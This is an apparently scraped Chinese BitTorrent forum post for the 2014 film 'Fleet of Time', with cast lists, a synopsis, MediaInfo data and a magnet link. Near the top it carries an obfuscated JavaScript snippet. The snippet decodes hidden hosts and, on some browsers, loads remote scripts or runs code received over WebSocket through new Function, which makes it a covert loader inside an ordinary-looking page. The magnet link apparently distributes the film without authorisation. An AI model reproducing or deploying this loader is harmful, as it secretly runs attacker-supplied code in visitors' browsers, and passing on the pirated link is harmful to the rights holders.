匆匆那年[国语中字].Fleet.of.Time.2014.2160p.WEB-DL.H265.HDR.AAC 4.07GB

版主小s 1月前 190

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 匆匆那年 / Fleet of Time
◎年  代 2014
◎产  地 中国大陆
◎类  别 爱情
◎语  言 汉语普通话
◎上映日期 2014-12-05(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt4284020/
◎豆瓣评分 5.6/10 (243145人评价)
◎豆瓣链接 https://movie.douban.com/subject/25779218/
◎片  长 119分钟
◎导  演 张一白 Yibai Zhang (id:1275554)
◎编  剧 李晗 Han Li (id:1368190)
       刘晗 Han Liu (id:1320816)
       九夜茴 Jiuyehui (id:1343082)
◎演  员 彭于晏 Eddie Peng (id:1013782)
       倪妮 Ni Ni (id:1315861)
       郑恺 Kai Zheng (id:1275564)
       魏晨 Vision Wei (id:1035594)
       张子萱 Zixuan Zhang (id:1316345)
       陈赫 He Chen (id:1313841)
       毕夏 Xia Bi (id:1344759)
       刘雅瑟 Yase Liu (id:1276157)
       曹卫宇 Weiyu Cao (id:1337942)
       张宁江 Ningjiang Zhang (id:1321998)
       桂纶镁 Lunmei Gwei (id:1215287)
       廖凡 Fan Liao (id:1007401)
       黄觉 Jue Huang (id:1275273)
       王景春 Jingchun Wang (id:1275934)
       张一白 Yibai Zhang (id:1275554)
       高群书 Qunshu Gao (id:1274943)
       梁静 Jing Liang (id:1274641)
       杜家毅 Jiayi Du (id:1275274)
       李静 Jing Li (id:1276000)
       陈明 Ming Chen (id:1314039)
       邹倚天 Yitian Zou (id:1318927)
       吴泳靓 Jingliang Wu (id:1400237)
       何索 Suo He (id:1392903)
       李恩晟 Ensheng Li (id:1391311)
       张一白 Yibai Zhang (id:1275554)
       王长田 Changtian Wang (id:1356370)
       古永锵 Victor Koo (id:1343103)
       曾咏汶 Wing Tsang (id:1335012)
       张文伯 Wenbo Zhang (id:1424719)
       荆建林 Jianlin Jing (id:1391818)
       梁翘柏 Kubert Leung (id:1327173)
       王菲 Faye Wong (id:1004858)
       李炳强 Bingqiang Li (id:1399852)
       孔劲蕾 Jinglei Kong (id:1325102)
       安巍 Wei An (id:1378393)
       黄海 Hai Huang (id:1401245)
       蔡婧 Cheldon Cai (id:1451004)
       陈奕迅 Eason Chan (id:1023424)
       廖凡 Fan Liao (id:1007401)
       何炅 Jiong He (id:1313023)
       桂纶镁 Lunmei Gwei (id:1215287)
       谢娜 Na Xie (id:1274270)
       韩寒 Han Han (id:1275307)
       张嘉佳 Jiajia Zhang (id:1313946)
       陈家瑛 Katie Chan (id:1376602)
       宋柯 Ke Song (id:1346282)
       林依轮 Allen Lin (id:1313324)
       小柯 Xiaoke (id:1322562)
       易小星 Joshua (id:1317854)
       李东田 Tony Li (id:1381971)

◎标  签 青春 / 爱情 / 校园 / 成长 / 2014 / 文艺 / 小说改编 / 中国大陆

◎简  介
  时光流转,曾经美好的青春时代有如一场不真实的梦。她充满躁动、喜悦、悲伤与愤慨,她是远离着社会现实尔虞我诈的青春懵懂,傻了傻气的纯真涂抹下最为亮丽耀眼的色彩。而今回首往事,即使如梦般虚幻,却又让人唏嘘不已,感慨万千。只因偶然的机缘,早已过了而立之年的陈寻(彭于晏 饰)回想起那个曾经呼喊过千遍万遍的名字。遥远的学生时代,陈寻与让他心动的女孩方茴(倪妮 饰),以及乔燃(魏晨 饰)、林嘉茉(张子萱 饰)、赵烨(郑恺 饰)等一般死党行走在尘土飞扬的校园里。友情、爱情在诸多禁忌的年代里如野草般自由疯长,曾经那是他们所坚守笃定的一切,而这些又都被碾压得支离不堪。许下的誓言你还记得吗?                                    
                                本片根据九夜茴的同名小说改编。

◎获奖情况 (共2项)
  第22届北京大学生电影节 (2015)
  最受大学生欢迎导演
   └──张一白 (id:1275554)

  第1届豆瓣电影年度榜单 (2014)
  12月最受关注电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 匆匆那年[email protected]p4

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 4.07 GiB

  8. Duration                                 : 1 h 59 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 4 885 kb/s

  11. Writing application                      : Lavf58.32.104


  12. Video

  13. ID                                       : 1

  14. Format                                   : HEVC

  15. Format/Info                              : High Efficiency Video Coding

  16. Format profile                           : Main [email protected]@Main

  17. HDR format                               : SMPTE ST 2086, HDR10 compatible

  18. Codec ID                                 : hev1

  19. Codec ID/Info                            : High Efficiency Video Coding

  20. Duration                                 : 1 h 59 min

  21. Bit rate                                 : 4 687 kb/s

  22. Width                                    : 3 840 pixels

  23. Height                                   : 1 608 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.032

  31. Stream size                              : 3.90 GiB (96%)

  32. Color range                              : Limited

  33. Color primaries                          : BT.2020

  34. Transfer characteristics                 : PQ

  35. Matrix coefficients                      : BT.2020 non-constant

  36. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  37. Mastering display luminance              : min: 0.0001 cd/m2, max: 1000 cd/m2

  38. Maximum Content Light Level              : 613 cd/m2

  39. Maximum Frame-Average Light Level        : 255 cd/m2

  40. Codec configuration box                  : hvcC


  41. Audio

  42. ID                                       : 2

  43. Format                                   : AAC LC

  44. Format/Info                              : Advanced Audio Codec Low Complexity

  45. Codec ID                                 : mp4a-40-2

  46. Duration                                 : 1 h 59 min

  47. Bit rate mode                            : Variable

  48. Bit rate                                 : 192 kb/s

  49. Maximum bit rate                         : 194 kb/s

  50. Channel(s)                               : 2 channels

  51. Channel layout                           : L R

  52. Sampling rate                            : 44.1 kHz

  53. Frame rate                               : 43.066 FPS (1024 SPF)

  54. Compression mode                         : Lossy

  55. Stream size                              : 162 MiB (4%)

  56. Default                                  : Yes

  57. Alternate group                          : 1



TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:8B176248C4DAF06486C6FB7A0BF8D8C392C16836
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回